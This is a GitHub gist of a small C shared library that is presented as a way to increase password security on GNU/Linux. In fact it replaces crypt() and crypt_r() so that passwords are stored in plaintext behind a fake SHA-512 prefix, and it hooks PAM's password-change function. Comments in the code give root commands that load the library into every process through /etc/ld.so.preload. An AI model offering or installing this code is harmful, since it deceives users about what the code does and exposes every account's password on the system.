Created
November 1, 2016 19:09
-
-
Save anonymous/8e957b41696c8853bea7b095117412d2 to your computer and use it in GitHub Desktop.
Increase password security on your GNU/Linux system in one simple step
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <unistd.h> | |
#include <crypt.h> | |
#include <string.h> | |
#include <dlfcn.h> | |
// compile: | |
// $ gcc nullcrypt.c -shared -fPIC -ldl -o nullcrypt.so | |
// install: | |
// # cp nullcrypt.so /lib | |
// # echo "/lib/nullcrypt.so" >>/etc/ld.so.preload | |
static void dothing(char *dst, const char *src) | |
{ | |
// Make libpam believe we're doing sha512 (otherwise it won't work) | |
strcpy(dst, "$6$"); | |
strcat(dst, src); | |
} | |
// for libcrypt | |
char *crypt(const char *key, const char *salt) | |
{ | |
static char buf[512]; | |
dothing(buf, key); | |
return buf; | |
} | |
char *crypt_r(const char *key, const char *salt, struct crypt_data *data) | |
{ | |
char *dst = (char*) data; | |
dothing(dst, key); | |
return dst; | |
} | |
// for pam_unix | |
static int (*_pam_sm_chauthtok)(void *pamh, int flags, int argc, const char **argv); | |
int pam_sm_chauthtok(void *pamh, int flags, int argc, const char **argv) | |
{ | |
char *newargv[argc+1]; | |
memcpy(newargv, argv, argc * sizeof(char*)); | |
newargv[argc] = "sha512"; | |
return _pam_sm_chauthtok(pamh, flags, argc+1, newargv); | |
} | |
__attribute__((constructor)) static void resolve(void) | |
{ | |
_pam_sm_chauthtok = dlsym(RTLD_NEXT, "pam_sm_chauthtok"); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment